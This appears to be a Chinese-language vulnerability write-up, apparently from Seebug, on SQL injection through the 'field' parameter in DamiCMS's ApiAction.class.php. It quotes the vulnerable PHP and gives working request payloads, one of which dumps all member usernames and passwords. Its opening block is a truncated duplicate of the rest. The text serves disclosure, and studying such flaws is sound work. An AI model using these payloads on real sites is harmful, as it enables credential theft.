VULHUB ™

<ul><li>/Web/Lib/Action/ApiAction.class.php</li></ul><pre class="">$field =!empty($_REQUEST['field'])?inject_check($_REQUEST['field']):''; $m=new Model($model,"",false); //如果使用了分页,缓存也不生效 if($page){ import("@.ORG.Page"); //这里改成你的Page类 $count=$m-&gt;where($where)-&gt;count(); $total_page = ceil($count / $pagesize); $p = new Page($count,$pagesize); //如果使用了分页，num将不起作用 $t=$m-&gt;field($field)-&gt;where($where)-&gt;limit($p-&gt;firstRow.','.$p-&gt;listRows)-&gt;order($order)-&gt;select(); //echo $m-&gt;getLastSql(); $ret = array('total_page'=&gt;$total_page,'data'=&gt;$t); } </pre><p>因为注入点在field里，所以可以绕过查询的关键字，导致注入。当传入：</p><pre class="">s=/api/ajax_arclist/model/article/field/database()%23</pre><p>执行的SQL语句为：</p><pre class="">SELECT database()# FROM `dami_article`</pre><p>页面返回：&nbsp;</p><p><img alt="87035C9E-A360-4281-84EA-98941C54B6AE.png" src="https://images.seebug.org/@/uploads/1434694877018-87035C9E-A360-4281-84EA-98941C54B6AE.png"...

<ul><li>/Web/Lib/Action/ApiAction.class.php</li></ul><pre class="">$field =!empty($_REQUEST['field'])?inject_check($_REQUEST['field']):''; $m=new Model($model,"",false); //如果使用了分页,缓存也不生效 if($page){ import("@.ORG.Page"); //这里改成你的Page类 $count=$m-&gt;where($where)-&gt;count(); $total_page = ceil($count / $pagesize); $p = new Page($count,$pagesize); //如果使用了分页，num将不起作用 $t=$m-&gt;field($field)-&gt;where($where)-&gt;limit($p-&gt;firstRow.','.$p-&gt;listRows)-&gt;order($order)-&gt;select(); //echo $m-&gt;getLastSql(); $ret = array('total_page'=&gt;$total_page,'data'=&gt;$t); } </pre><p>因为注入点在field里，所以可以绕过查询的关键字，导致注入。当传入：</p><pre class="">s=/api/ajax_arclist/model/article/field/database()%23</pre><p>执行的SQL语句为：</p><pre class="">SELECT database()# FROM `dami_article`</pre><p>页面返回：&nbsp;</p><p><img alt="87035C9E-A360-4281-84EA-98941C54B6AE.png" src="https://images.seebug.org/@/uploads/1434694877018-87035C9E-A360-4281-84EA-98941C54B6AE.png" data-image-size="519,61"><br></p><p>证明漏洞存在。</p><p>访问地址：</p><pre class="">http://10.211.55.12/damicms/index.php?s=/api/ajax_arclist/model/article/field/username,userpwd%20from%20dami_member%23</pre><p>得到所有用户的帐号密码：&nbsp;</p><p><img alt="59028A1D-7EBE-46E7-AA40-66696D0046D6.png" src="https://images.seebug.org/@/uploads/1434694899736-59028A1D-7EBE-46E7-AA40-66696D0046D6.png" data-image-size="817,83"><br></p>